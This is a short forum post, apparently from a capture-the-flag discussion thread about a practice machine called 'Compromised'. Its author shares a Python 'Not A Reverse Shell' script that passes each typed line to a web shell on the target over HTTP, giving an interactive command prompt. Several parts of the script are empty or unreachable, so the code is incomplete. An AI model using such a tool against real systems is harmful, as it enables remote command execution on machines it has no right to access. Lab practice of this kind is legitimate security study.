Official Compromised Discussion

Real fun box, I got stuck at root, thanks to @LMAY75 for the nudge.
On a hindsight, it was obvious.

I loved scripting to own this box, this is my take on the “Not A Reverse Shell”, nothing new but since nobody posted something similar (having history, history search and emacs style special keys).

#!/usr/bin/env python3
import cmd

def execute(line):
    import requests
    r = requests.get(target, params={"YOURCMDARG":line})
    if r.status_code == 200:
        return r.text
        return f"{r.text}\r\nnars> ERROR: http response code was {r.status_code}"

class NotAReverseShell(cmd.Cmd):
    prompt="nars> "

    def do_help(self, line):
        print("Not A Reverse Shell, a pseudo shell when you cannot have one.")

    def default(self, line):

    def do_EOF(self, line):
        return True

    def do_exit(self, line):
        return True

    def do_quit(self, line):
        return True

if __name__ == "__main__":

Beautiful box!